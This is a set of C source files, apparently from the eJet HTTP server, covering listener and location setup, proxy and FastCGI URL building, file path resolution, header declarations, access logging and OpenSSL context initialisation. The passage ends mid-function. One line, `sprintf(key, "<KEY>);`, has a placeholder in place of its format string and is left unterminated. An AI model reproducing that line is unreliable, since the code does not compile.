ret = json_mgetP(jhl, "ssl ca certificate", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
cacert = value;
}
ret = json_mgetP(jhl, "request process library", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
libfile = value;
}
hl = http_listen_add(mgmt, ip, port, forwardproxy);
if (hl) {
hl->jsonobj = jhl;
if (ssl)
http_listen_ssl_ctx_set(hl, cert, prikey, cacert);
if (libfile)
http_listen_cblibfile_set(hl, libfile);
ret = json_mgetP(jhl, "script", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
arr_push(hl->script_list, ckstr_new(value, valuelen));
for (j = 1; j < ret; j++) {
sprintf(key, "<KEY>);
subret = json_mgetP(jhl, key, -1, (void **)&value, &valuelen);
if (subret > 0 && value && valuelen > 0)
arr_push(hl->script_list, ckstr_new(value, valuelen));
}
}
ret = json_mgetP(jhl, "reply_script", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
arr_push(hl->reply_script_list, ckstr_new(value, valuelen));
for (j = 1; j < ret; j++) {
sprintf(key, "reply_script[%d]", j);
subret = json_mgetP(jhl, key, -1, (void **)&value, &valuelen);
if (subret > 0 && value && valuelen > 0)
arr_push(hl->reply_script_list, ckstr_new(value, valuelen));
}
}
http_host_build(hl, jhl);
}
sprintf(key, "http.listen[%d]", i);
ret = json_mget_obj(mgmt->cnfjson, key, -1, &jhl);
if (ret <= 0) break;
}
http_listen_start_all(mgmt);
return 0;
}
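/* A configuration sketch for one entry of "http.listen", using only the key names
   parsed above; the JSON layout and the values themselves are assumptions:

   "local ip"                : "*",
   "port"                    : 443,
   "forward proxy"           : "off",
   "ssl"                     : "on",
   "ssl certificate"         : "cert.pem",
   "ssl private key"         : "cert.key",
   "ssl ca certificate"      : "cacert.pem",
   "request process library" : "reqhandle.so some-argument",
   "script"                  : "...",
   "reply_script"            : "...",

   plus the virtual-host objects handled by http_host_build(hl, jhl).
*/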
void * http_host_instance (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPListen * hl = NULL;
HTTPHost * host = NULL;
ckstr_t key;
if (!msg) return NULL;
hl = (HTTPListen *)msg->hl;
if (!hl) return NULL;
key.p = msg->req_host;
key.len = msg->req_hostlen;
EnterCriticalSection(&hl->hlCS);
host = ht_get(hl->host_table, &key);
if (!host) {
host = hl->defaulthost;
}
LeaveCriticalSection(&hl->hlCS);
return host;
}
void * http_loc_instance (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPListen * hl = NULL;
HTTPHost * host = NULL;
HTTPLoc * ploc = NULL;
ckstr_t key;
char buf[4096];
int ret = 0;
int i, j, num;
#ifdef UNIX
regmatch_t pmat[16];
#endif
#if defined(_WIN32) || defined(_WIN64)
int ovec[36];
#endif
if (!msg) return NULL;
hl = (HTTPListen *)msg->hl;
if (!hl) return NULL;
/* the number of Location re-instantiations must not exceed 16 */
if (++msg->locinst_times >= 16)
return NULL;
key.p = msg->req_host;
key.len = msg->req_hostlen;
EnterCriticalSection(&hl->hlCS);
host = ht_get(hl->host_table, &key);
if (!host) {
host = hl->defaulthost;
}
LeaveCriticalSection(&hl->hlCS);
if (!host) return NULL;
msg->phost = host;
/* for CONNECT method, req_path is NULL */
if (!msg->docuri->path || msg->docuri->pathlen <= 0)
return NULL;
str_secpy(buf, sizeof(buf)-1, msg->docuri->path, msg->docuri->pathlen);
/* exact matching: check if the request path is exactly equal to a location path */
ploc = ht_get(host->exact_loc_table, buf);
if (ploc) {
msg->ploc = ploc;
msg->matchnum = 1;
msg->matchstr[0].p = msg->docuri->path;
msg->matchstr[0].len = msg->docuri->pathlen;
goto retloc;
}
/* prefix matching: check if the request path shares a prefix with a location path */
ret = actrie_get(host->prefix_actrie, msg->docuri->path, msg->docuri->pathlen, (void **)&ploc);
if (ret > 0 && ploc) {
msg->ploc = ploc;
msg->matchnum = 1;
msg->matchstr[0].p = msg->docuri->path;
msg->matchstr[0].len = ret;
goto retloc;
}
/* regular expression matching: check if the request path matches a location regex */
num = arr_num(host->regex_list);
for (i = 0; i < num; i++) {
#ifdef UNIX
ret = regexec(arr_value(host->regex_list, i), buf, 16, pmat, 0);
if (ret == 0) {
#endif
#if defined(_WIN32) || defined(_WIN64)
ret = pcre_exec(arr_value(host->regex_list, i), NULL, buf, strlen(buf), 0, 0, ovec, 36);
if (ret > 0) {
#endif
ploc = arr_value(host->regex_loc_list, i);
msg->ploc = ploc;
msg->matchnum = 0;
#ifdef UNIX
for (j = 0; j < 16; j++) {
if (pmat[j].rm_so >= 0) {
msg->matchstr[msg->matchnum].p = msg->docuri->path + pmat[j].rm_so;
msg->matchstr[msg->matchnum].len = pmat[j].rm_eo - pmat[j].rm_so;
msg->matchnum++;
continue;
}
break;
}
#endif
#if defined(_WIN32) || defined(_WIN64)
for (j = 0; j < ret; j++) {
msg->matchstr[msg->matchnum].p = msg->docuri->path + ovec[2 * j];
msg->matchstr[msg->matchnum].len = ovec[2 * j + 1] - ovec[2 * j];
msg->matchnum++;
}
#endif
goto retloc;
}
}
msg->ploc = host->defaultloc;
ploc = msg->ploc;
msg->matchnum = 1;
msg->matchstr[0].p = msg->docuri->path; // matching '/'
msg->matchstr[0].len = 1;
retloc:
/* script is interpreted and executed here */
http_script_exec(msg);
return ploc;
}
int http_loc_passurl_get (void * vmsg, int servtype, char * url, int urllen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPLoc * ploc = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pmatend = NULL;
if (!msg) return -1;
if (!url) return -2;
url[0] = '\0';
ploc = (HTTPLoc *)msg->ploc;
if (!ploc) return -3;
/* when location type is not proxy or fastcgi, just return */
if (ploc->type != servtype) {
return -10;
}
if (ploc->passurl == NULL) {
return -11;
}
if (servtype == SERV_FASTCGI) {
str_secpy(url, urllen, ploc->passurl, strlen(ploc->passurl));
return strlen(url);
}
if (ploc->matchtype == MATCH_REGEX_CASE || ploc->matchtype == MATCH_REGEX_NOCASE) {
/* when the matching type is regex, substitute
   $num with the corresponding matched substring */
http_var_copy(msg, ploc->passurl, strlen(ploc->passurl),
url, urllen, msg->matchstr, msg->matchnum, "passurl", 7);
} else {
/* for non-regex matching, strip the matched substring from req_path
   and append the remainder of req_path to passurl */
str_secpy(url, urllen, ploc->passurl, str_len(ploc->passurl));
pbgn = msg->docuri->path;
pend = msg->docuri->path + msg->docuri->pathlen;
if (msg->matchnum > 0) {
poct = msg->matchstr[0].p;
pmatend = poct + msg->matchstr[0].len;
if (poct > pbgn)
str_secat(url, urllen - str_len(url), pbgn, poct - pbgn);
if (pmatend < pend)
str_secat(url, urllen - str_len(url), pmatend, pend - pmatend);
} else {
str_secat(url, urllen - str_len(url), pbgn, pend - pbgn);
}
}
if (msg->req_query && msg->req_querylen > 0) {
if (memchr(url, '?', str_len(url)) == NULL) {
str_secat(url, urllen - str_len(url), "?", 1);
str_secat(url, urllen - str_len(url), msg->req_query, msg->req_querylen);
} else {
/*str_secat(url, urllen - str_len(url), "&", 1);
str_secat(url, urllen - str_len(url), msg->req_query, msg->req_querylen);*/
}
}
return strlen(url);
}
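/* A worked sketch of the two branches above (location paths and passurl values are
   illustrative, not taken from the original source):

   - non-regex (e.g. prefix) match: passurl "http://10.0.0.2:8080/cache/",
     matched prefix "/img/", request path "/img/a/b.png" with query "sz=2"
       -> url "http://10.0.0.2:8080/cache/a/b.png?sz=2"
     (the matched substring is stripped from the path, the remainder is appended,
      then the query string is attached).

   - regex match: passurl "http://10.0.0.2:8080/$1", where "$1" is replaced by the
     first captured substring in msg->matchstr[] via http_var_copy().
*/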
char * http_root_path (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPHost * phost = NULL;
HTTPLoc * ploc = NULL;
if (!msg) return ".";
if (!msg->ploc) {
if (msg->phost) {
phost = (HTTPHost *)msg->phost;
return phost->root;
}
return ".";
}
ploc = (HTTPLoc *)msg->ploc;
return ploc->root;
}
int http_real_file (void * vmsg, char * path, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPLoc * ploc = NULL;
char * root = NULL;
int i, slen = 0;
int retlen = 0;
if (!msg) return -1;
if (!path || len <= 0) return -2;
root = http_root_path(msg);
retlen = str_len(root);
if (path && len > 0)
str_secpy(path, len, root, retlen);
if (msg->docuri->path && msg->docuri->pathlen > 0) {
if (path) {
slen = strlen(path);
str_secpy(path + slen, len - slen, msg->docuri->path, msg->docuri->pathlen);
}
retlen += msg->docuri->pathlen;
} else {
if (path) {
slen = strlen(path);
str_secpy(path + slen, len - slen, "/", 1);
}
retlen += 1;
}
if (path && file_is_dir(path) && (ploc = msg->ploc)) {
slen = strlen(path);
for (i = 0; i < (int)ploc->indexnum; i++) {
snprintf(path + slen, len - slen, "%s", ploc->index[i]);
if (file_is_regular(path)) {
return strlen(path);
}
}
path[slen] = '\0';
}
if (path) return strlen(path);
return retlen;
}
int http_real_path (void * vmsg, char * path, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char * root = NULL;
int slen = 0;
int retlen = 0;
if (!msg) return -1;
if (!path || len <= 0) return -2;
root = http_root_path(msg);
retlen = str_len(root);
if (path && len > 0)
str_secpy(path, len, root, retlen);
if (path) {
slen = strlen(path);
str_secpy(path + slen, len - slen, msg->docuri->dir, msg->docuri->dirlen);
}
retlen += msg->docuri->dirlen;
if (path) return strlen(path);
return retlen;
}
void * http_prefix_loc (void * vhl, char * hostn, int hostlen, char * matstr, int len,
char * root, void * cbfunc, void * cbobj, void * tplfile)
{
HTTPListen * hl = (HTTPListen *)vhl;
HTTPHost * host = NULL;
HTTPLoc * ploc = NULL;
char * ptmp = NULL;
int i, num;
if (!hl) return NULL;
if (!matstr) return NULL;
if (len < 0) len = strlen(matstr);
if (len <= 0) return NULL;
host = http_host_create(hl, hostn, hostlen, NULL, NULL, NULL, NULL);
if (!host) return NULL;
EnterCriticalSection(&host->hostCS);
num = arr_num(host->prefix_loc_list);
for (i = 0; i < num; i++) {
ploc = arr_value(host->prefix_loc_list, i);
if (!ploc) continue;
if (ploc->path && str_len(ploc->path) == len &&
str_ncmp(ploc->path, matstr, len) == 0)
{
break;
}
}
if (!ploc || i >= num) {
ploc = http_loc_alloc(matstr, len, 1, MATCH_PREFIX, SERV_CALLBACK, root);
if (!ploc) {
LeaveCriticalSection(&host->hostCS);
return NULL;
}
ploc->indexnum = 2;
ploc->index[0] = "index.html";
ploc->index[1] = "index.htm";
arr_push(host->prefix_loc_list, ploc);
actrie_add(host->prefix_actrie, ploc->path, -1, ploc);
} else {
ploc->matchtype = MATCH_PREFIX;
ploc->type |= SERV_CALLBACK;
if (root && strlen(root) > 0 && (ptmp = realpath(root, NULL))) {
str_secpy(ploc->root, sizeof(ploc->root)-1, ptmp, strlen(ptmp));
free(ptmp);
if (ploc->root[strlen(ploc->root) - 1] == '/')
ploc->root[strlen(ploc->root) - 1] = '\0';
}
}
LeaveCriticalSection(&host->hostCS);
ploc->cbfunc = cbfunc;
ploc->cbobj = cbobj;
ploc->tplfile = tplfile;
return ploc;
}
void * http_exact_loc (void * vhl, char * hostn, int hostlen, char * matstr, int len,
char * root, void * cbfunc, void * cbobj, void * tplfile)
{
HTTPListen * hl = (HTTPListen *)vhl;
HTTPHost * host = NULL;
HTTPLoc * ploc = NULL;
char * ptmp = NULL;
char buf[1024];
if (!hl) return NULL;
if (!matstr) return NULL;
if (len < 0) len = strlen(matstr);
if (len <= 0) return NULL;
host = http_host_create(hl, hostn, hostlen, NULL, NULL, NULL, NULL);
if (!host) return NULL;
str_secpy(buf, sizeof(buf)-1, matstr, len);
EnterCriticalSection(&host->hostCS);
ploc = ht_get(host->exact_loc_table, buf);
if (!ploc) {
ploc = http_loc_alloc(matstr, len, 1, MATCH_EXACT, SERV_CALLBACK, root);
if (!ploc) {
LeaveCriticalSection(&host->hostCS);
return NULL;
}
ht_set(host->exact_loc_table, ploc->path, ploc);
} else {
ploc->matchtype = MATCH_EXACT;
ploc->type |= SERV_CALLBACK;
if (root && strlen(root) > 0 && (ptmp = realpath(root, NULL))) {
str_secpy(ploc->root, sizeof(ploc->root)-1, ptmp, strlen(ptmp));
free(ptmp);
if (ploc->root[strlen(ploc->root) - 1] == '/')
ploc->root[strlen(ploc->root) - 1] = '\0';
}
}
LeaveCriticalSection(&host->hostCS);
ploc->cbfunc = cbfunc;
ploc->cbobj = cbobj;
ploc->tplfile = tplfile;
return ploc;
}
void * http_regex_loc (void * vhl, char * hostn, int hostlen, char * matstr, int len, int ignorecase,
char * root, void * cbfunc, void * cbobj, void * tplfile)
{
HTTPListen * hl = (HTTPListen *)vhl;
HTTPHost * host = NULL;
HTTPLoc * ploc = NULL;
#ifdef UNIX
regex_t * preg = NULL;
#endif
#if defined(_WIN32) || defined(_WIN64)
pcre * preg = NULL;
char * errstr = NULL;
int erroff = 0;
#endif
char * ptmp = NULL;
int i, num;
if (!hl) return NULL;
if (!matstr) return NULL;
if (len < 0) len = strlen(matstr);
if (len <= 0) return NULL;
host = http_host_create(hl, hostn, hostlen, NULL, NULL, NULL, NULL);
if (!host) return NULL;
EnterCriticalSection(&host->hostCS);
num = arr_num(host->regex_loc_list);
for (i = 0; i < num; i++) {
ploc = arr_value(host->regex_loc_list, i);
if (!ploc) continue;
if (ploc->path && str_len(ploc->path) == len &&
str_ncmp(ploc->path, matstr, len) == 0)
{
break;
}
}
if (!ploc || i >= num) {
ploc = http_loc_alloc(matstr, len, 1,
ignorecase ? MATCH_REGEX_NOCASE : MATCH_REGEX_CASE,
SERV_CALLBACK, root);
if (!ploc) {
LeaveCriticalSection(&host->hostCS);
return NULL;
}
arr_push(host->regex_loc_list, ploc);
#ifdef UNIX
preg = kzalloc(sizeof(regex_t));
if (ploc->matchtype == MATCH_REGEX_CASE) { //case sensitive
regcomp(preg, ploc->path, REG_EXTENDED);
} else { //ignoring case
regcomp(preg, ploc->path, REG_EXTENDED | REG_ICASE);
}
#endif
#if defined(_WIN32) || defined(_WIN64)
if (ploc->matchtype == MATCH_REGEX_CASE) { //case sensitive
preg = pcre_compile(ploc->path, 0, &errstr, &erroff, NULL);
} else { //ignoring case
preg = pcre_compile(ploc->path, PCRE_CASELESS, &errstr, &erroff, NULL);
}
#endif
arr_push(host->regex_list, preg);
} else {
ploc->matchtype = ignorecase ? MATCH_REGEX_NOCASE : MATCH_REGEX_CASE;
ploc->type |= SERV_CALLBACK;
if (root && strlen(root) > 0 && (ptmp = realpath(root, NULL))) {
str_secpy(ploc->root, sizeof(ploc->root)-1, ptmp, strlen(ptmp));
free(ptmp);
if (ploc->root[strlen(ploc->root) - 1] == '/')
ploc->root[strlen(ploc->root) - 1] = '\0';
}
}
LeaveCriticalSection(&host->hostCS);
ploc->cbfunc = cbfunc;
ploc->cbobj = cbobj;
ploc->tplfile = tplfile;
return ploc;
}
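/* Registration sketch (assumptions: hl is an HTTPListen returned by http_listen_add or
   http_listen_start; the callback shape matches the invocation
   (*ploc->cbfunc)(ploc->cbobj, msg, ploc->tplfile ? ploc->tplfile : path) performed
   during request processing):

   int my_status_cb (void * cbobj, void * vmsg, char * tplfile)
   {
       HTTPMsg * msg = (HTTPMsg *)vmsg;
       msg->SetStatus(msg, 200, NULL);
       return msg->Reply(msg);
   }

   http_exact_loc(hl, NULL, -1, "/status", -1, ".", (void *)my_status_cb, NULL, NULL);
*/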
<|start_filename|>include/http_fcgi_srv.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_FCGI_SRV_H_
#define _HTTP_FCGI_SRV_H_
#ifdef __cplusplus
extern "C" {
#endif
#define t_fcgi_srv_life 2201
typedef struct http_fcgi_srv {
/* cgisrv holds the UNIX-socket address or the IP/domain address of the FPM server, e.g.
       unix:/dev/shm/php-cgi.sock
       fastcgi://127.0.0.1:9000
*/
char cgisrv[256];
uint8 socktype; //0-TCP 1-Unix Socket
char unixsock[256];
char ip[41];
int port;
CRITICAL_SECTION msgCS;
uint16 msgid;
hashtab_t * msg_table;
void * msg_fifo;
int maxcon;
CRITICAL_SECTION conCS;
ulong conid;
rbtree_t * con_tree;
time_t stamp;
void * life_timer;
void * mgmt;
void * pcore;
} FcgiSrv, fcgi_srv_t;
int http_mgmt_fcgisrv_init (void * vmgmt);
int http_mgmt_fcgisrv_clean(void * vmgmt);
int http_mgmt_fcgisrv_add (void * vmgmt, void * vsrv);
void * http_mgmt_fcgisrv_get (void * vmgmt, char * cgisrv);
void * http_mgmt_fcgisrv_del (void * vmgmt, char * cgisrv);
void * http_fcgisrv_open (void * vmgmt, char * cgisrv, int maxcon);
int http_fcgisrv_close(void * vsrv);
uint16 http_fcgisrv_get_msgid (void * vsrv);
ulong http_fcgisrv_get_conid (void * vsrv);
void * http_fcgisrv_connect (void * vsrv);
int http_fcgisrv_msg_add (void * vsrv, void * vmsg);
void * http_fcgisrv_msg_get (void * vsrv, uint16 msgid);
void * http_fcgisrv_msg_del (void * vsrv, uint16 msgid);
int http_fcgisrv_msg_push (void * vsrv, void * vmsg);
void * http_fcgisrv_msg_pull (void * vsrv);
int http_fcgisrv_msg_num (void * vsrv);
int http_fcgisrv_con_add (void * vsrv, void * vpcon);
void * http_fcgisrv_con_get (void * vsrv, ulong conid);
void * http_fcgisrv_con_del (void * vsrv, ulong conid);
int http_fcgisrv_con_num (void * vsrv);
int http_fcgisrv_lifecheck (void * vsrv);
int http_fcgisrv_pump (void * vsrv, void * vobj, int event, int fdtype);
#ifdef __cplusplus
}
#endif
#endif
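/* Usage sketch (assumptions: mgmt is the HTTPMgmt handle; the addresses follow the two
   forms documented in the struct comment above; 100 is an arbitrary connection limit):

   void * srv1 = http_fcgisrv_open(mgmt, "unix:/dev/shm/php-cgi.sock", 100);
   void * srv2 = http_fcgisrv_open(mgmt, "fastcgi://127.0.0.1:9000", 100);
*/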
<|start_filename|>include/http_header.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_HEADER_H_
#define _HTTP_HEADER_H_
#ifdef __cplusplus
extern "C" {
#endif
typedef struct HeaderUnit_ {
void * res[2];
char * name;
int namelen;
char * value;
int valuelen;
uint32 namepos;
uint32 valuepos;
frame_p frame;
void * next;
} HeaderUnit;
#define HUName(unit) ((char *)frameP((unit)->frame) + (unit)->namepos)
#define HUValue(unit) ((char *)frameP((unit)->frame) + (unit)->valuepos)
#define HUPos(frame, p) ((char *)(p) - (char *)frameP(frame))
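/* Access sketch (assumptions: msg is an HTTPMsg whose request header has been parsed;
   type 0 selects request headers, as used elsewhere in this source):

   HeaderUnit * hu = http_header_get(msg, 0, "Host", 4);
   if (hu) {
       char * val  = HUValue(hu);   // resolves valuepos against the header frame
       int    vlen = hu->valuelen;
   }
*/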
HeaderUnit * hunit_alloc ();
int hunit_free (void * vhunit);
void hunit_void_free (void * vhunit);
int hunit_cmp_hunit_by_name(void * a, void * b);
ulong hunit_hash_func (void * key);
int hunit_cmp_key (void * a, void * b);
int hunit_set_hashfunc (hashtab_t * htab);
int hunit_add (hashtab_t * htab, char * name, int namelen, void * value);
HeaderUnit * hunit_get (hashtab_t * htab, char * name, int namelen);
HeaderUnit * hunit_del (hashtab_t * htab, char * name, int namelen);
HeaderUnit * hunit_get_from_list (arr_t * hlist, char * name, int namelen);
typedef int HeaderEncode (void * vmsg, HeaderUnit * unit);
typedef int HeaderDecode (void * vmsg, char * pbin, int binlen);
int http_header_add (void * vmsg, int type, char * name, int namelen, char * value, int valuelen);
int http_header_del (void * vmsg, int type, char * name, int namelen);
int http_header_delall (void * vmsg, int type);
HeaderUnit * http_header_get (void * vmsg, int type, char * name, int namelen);
HeaderUnit * http_header_get_index (void * vmsg, int type, int index);
int http_header_get_int (void * vmsg, int type, char * name, int namelen);
uint32 http_header_get_uint32 (void * vmsg, int type, char * name, int namelen);
long http_header_get_long (void * vmsg, int type, char * name, int namelen);
ulong http_header_get_ulong (void * vmsg, int type, char * name, int namelen);
int64 http_header_get_int64 (void * vmsg, int type, char * name, int namelen);
uint64 http_header_get_uint64 (void * vmsg, int type, char * name, int namelen);
int http_header_append (void * vmsg, int type, char * name, int namelen, char * value, int valuelen);
/* date string defined by RFC 822, updated by RFC 1123
Sun, 17 Dec 2000 08:21:33 GMT */
int http_header_append_date (void * vmsg, int type, char * name, int namelen, time_t dtval);
int http_header_append_int (void * vmsg, int type, char * name, int namelen, int ival);
int http_header_append_uint32 (void * vmsg, int type, char * name, int namelen, uint32 ival);
int http_header_append_long (void * vmsg, int type, char * name, int namelen, long ival);
int http_header_append_ulong (void * vmsg, int type, char * name, int namelen, ulong ival);
int http_header_append_int64 (void * vmsg, int type, char * name, int namelen, int64 ival);
int http_header_append_uint64 (void * vmsg, int type, char * name, int namelen, uint64 ival);
int http_entity_header_parse (void * vmsg, int type, char * pbyte, int len);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_log.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_mgmt.h"
#include "http_msg.h"
#include "http_variable.h"
#include "http_log.h"
void * http_log_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPLog * plog = NULL;
char key[128];
int keylen = 0;
char * value = NULL;
int vallen = 0;
int i, ret;
if (!mgmt) return NULL;
plog = kzalloc(sizeof(*plog));
if (!plog) return NULL;
sprintf(key, "http.access log.log2file"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&value, &vallen);
if (ret <= 0 || !value) plog->enable = 0;
if (value && strcasecmp(value, "on") == 0)
plog->enable = 1;
else
plog->enable = 0;
sprintf(key, "http.access log.log file"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&value, &vallen);
if (ret <= 0 || !value || vallen <= 0) {
plog->logfile = "./access.log";
} else {
plog->logfile = value;
file_dir_create(plog->logfile, 1);
}
plog->format = frame_new(256);
sprintf(key, "http.access log.format"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&value, &vallen);
if (ret > 0 && value && vallen > 0) {
frame_put_nlast(plog->format, value, vallen);
frame_put_last(plog->format, ' ');
for (i = 1; i < ret; i++) {
sprintf(key, "http.access log.format[%d]", i); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&value, &vallen);
if (ret > 0 && value && vallen > 0) {
frame_put_nlast(plog->format, value, vallen);
frame_put_last(plog->format, ' ');
}
}
} else {
frame_append(plog->format, "$remote_addr - [$datetime[createtime]] \"$request\" "
"\"$request_header[host]\" \"$request_header[referer]\" "
"\"$http_user_agent\" $status $bytes_recv $bytes_sent");
}
InitializeCriticalSection(&plog->logCS);
plog->loglen = 4096;
plog->logcont = kalloc(plog->loglen + 1);
plog->fp = fopen(plog->logfile, "a+");
plog->mgmt = mgmt;
tolog(1, "eJet - AccessLog '%s' init successfully.\n", plog->logfile);
return plog;
}
int http_log_clean (void * vlog)
{
HTTPLog * plog = (HTTPLog *)vlog;
if (!plog) return -1;
if (plog->fp) {
fclose(plog->fp);
plog->fp = NULL;
}
if (plog->format) {
frame_free(plog->format);
plog->format = NULL;
}
if (plog->logcont) {
kfree(plog->logcont);
plog->logcont = NULL;
}
DeleteCriticalSection(&plog->logCS);
kfree(plog);
tolog(1, "eJet - AccessLog resource freed.\n");
return 0;
}
int http_log_write (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HTTPLog * plog = NULL;
int ret = 0;
if (!msg) return -1;
//if (msg->proxied == 2) return 0;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -2;
plog = (HTTPLog *)mgmt->httplog;
if (!plog) return -3;
if (!plog->fp) return -200;
ret = http_var_copy(msg, frameP(plog->format), frameL(plog->format),
NULL, 0, NULL, 0, NULL, 0);
if (ret < 0) return -100;
EnterCriticalSection(&plog->logCS);
if (ret > plog->loglen) {
plog->loglen = ret;
kfree(plog->logcont);
plog->logcont = kalloc(plog->loglen + 1);
}
ret = http_var_copy(msg, frameP(plog->format), frameL(plog->format),
plog->logcont, plog->loglen, NULL, 0, NULL, 0);
if (ret > 0) {
fprintf(plog->fp, "%s\n", plog->logcont);
fflush(plog->fp);
}
LeaveCriticalSection(&plog->logCS);
return ret;
}
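/* A configuration sketch using only the key names read above ("http.access log.log2file",
   "http.access log.log file", "http.access log.format"); the JSON layout and values are
   assumptions:

   "access log": {
       "log2file" : "on",
       "log file" : "/var/log/ejet/access.log",
       "format"   : ["$remote_addr", "\"$request\"", "$status", "$bytes_recv", "$bytes_sent"]
   }

   The $-variables shown come from the built-in default format above and are expanded by
   http_var_copy() in http_log_write().
*/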
<|start_filename|>src/http_ssl.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_mgmt.h"
#include "http_msg.h"
#include "http_con.h"
#include "http_listen.h"
#include "http_cli_io.h"
#include "http_srv_io.h"
#include "http_ssl.h"
#ifdef UNIX
#include <sys/mman.h>
#endif
#ifdef HAVE_OPENSSL
int ssl_conn_index;
int http_ssl_library_init ()
{
if (!SSL_library_init ()) {
tolog(1, "eJet - OpenSSL library init failed\n");
return -1;
}
OpenSSL_add_ssl_algorithms();
SSL_load_error_strings ();
ssl_conn_index = SSL_get_ex_new_index(0, NULL, NULL, NULL, NULL);
if (ssl_conn_index == -1) {
tolog(1, "eJet - OpenSSL: SSL_get_ex_new_index() failed\n");
return -2;
}
tolog(1, "eJet - OpenSSL library init successfully.\n");
return 0;
}
void * http_ssl_server_ctx_init (char * cert, char * prikey, char * cacert)
{
SSL_CTX * ctx = NULL;
struct stat stcert;
struct stat stkey;
struct stat stca;
if (!cert || file_stat(cert, &stcert) < 0)
return NULL;
if (!prikey || file_stat(prikey, &stkey) < 0)
return NULL;
ctx = SSL_CTX_new(SSLv23_method());
if (!ctx) return NULL;
/* load certificate and private key, verify the cert with private key */
if (SSL_CTX_use_certificate_file(ctx, cert, SSL_FILETYPE_PEM) <= 0) {
tolog(1, "eJet - ServerSSL: loading Certificate file %s failed\n", cert);
SSL_CTX_free(ctx);
return NULL;
}
if (SSL_CTX_use_PrivateKey_file(ctx, prikey, SSL_FILETYPE_PEM) <= 0) {
tolog(1, "eJet - ServerSSL: loading Private Key file %s failed\n", prikey);
SSL_CTX_free(ctx);
return NULL;
}
if (!SSL_CTX_check_private_key(ctx)) {
tolog(1, "eJet - ServerSSL: Certificate verify failed! Private Key %s DOES NOT "
"match Certificate %s\n", cert, prikey);
SSL_CTX_free(ctx);
return NULL;
}
if (cacert && file_stat(cacert, &stca) >= 0) {
if (SSL_CTX_load_verify_locations(ctx, cacert, NULL) != 1) {
tolog(1, "eJet - ServerSSL: load CAcert %s failed\n", cacert);
goto retctx;
}
if (SSL_CTX_set_default_verify_paths(ctx) != 1) {
tolog(1, "eJet - ServerSSL: SSL_ctx_set_default_verify_path failed\n");
goto retctx;
}
}
retctx:
if (SSL_CTX_set_tlsext_servername_callback(ctx, http_ssl_servername_select) == 0) {
tolog(1, "eJet - SSL: select servername by TLSEXT SNI failed.\n");
}
tolog(1, "eJet - SSL server load Cert <%s> PriKey <%s> CACert <%s> successfully\n", cert, prikey, cacert);
return ctx;
}
void * http_ssl_client_ctx_init (char * cert, char * prikey, char * cacert)
{
SSL_CTX * ctx = NULL;
struct stat stcert;
struct stat stkey;
struct stat stca;
uint8 hascert = 0;
uint8 haskey = 0;
ctx = SSL_CTX_new(SSLv23_client_method());
if (!ctx) return NULL;
if (cert && file_stat(cert, &stcert) >= 0) {
/* load certificate and private key, verify the cert with private key */
if (SSL_CTX_use_certificate_file(ctx, cert, SSL_FILETYPE_PEM) <= 0) {
tolog(1, "eJet - ClientSSL: loading Certificate file %s failed\n", cert);
SSL_CTX_free(ctx);
return NULL;
}
hascert = 1;
}
if (prikey && file_stat(prikey, &stkey) >= 0) {
if (SSL_CTX_use_PrivateKey_file(ctx, prikey, SSL_FILETYPE_PEM) <= 0) {
tolog(1, "eJet - ClientSSL: loading Private Key file %s failed\n", prikey);
SSL_CTX_free(ctx);
return NULL;
}
haskey = 1;
}
if (hascert && haskey && !SSL_CTX_check_private_key(ctx)) {
tolog(1, "eJet - ClientSSL: Certificate verify failed! Private Key %s DOES NOT "
"match Certificate %s\n", cert, prikey);
SSL_CTX_free(ctx);
return NULL;
}
if (cacert && file_stat(cacert, &stca) >= 0) {
if (SSL_CTX_load_verify_locations(ctx, cacert, NULL) != 1) {
tolog(1, "eJet - ClientSSL: load CAcert %s failed\n", cacert);
goto retctx;
}
if (SSL_CTX_set_default_verify_paths(ctx) != 1) {
tolog(1, "eJet - ClientSSL: SSL_ctx_set_default_verify_path failed\n");
goto retctx;
}
}
retctx:
return ctx;
}
int http_ssl_ctx_free (void * vctx)
{
SSL_CTX * ctx = (SSL_CTX *)vctx;
if (!ctx) return -1;
SSL_CTX_free(ctx);
tolog(1, "eJet - SSL server ctx freed.\n");
return 0;
}
SSL * http_ssl_new (SSL_CTX * ctx, void * vcon)
{
SSL * ssl = NULL;
HTTPCon * pcon = (HTTPCon *)vcon;
void * pdev = NULL;
if (!ctx || !pcon || !pcon->pdev) return NULL;
ssl = SSL_new(ctx);
if (!ssl) {
tolog(1, "eJet - SSL: createing SSL instance failed\n");
return NULL;
}
pdev = pcon->pdev;
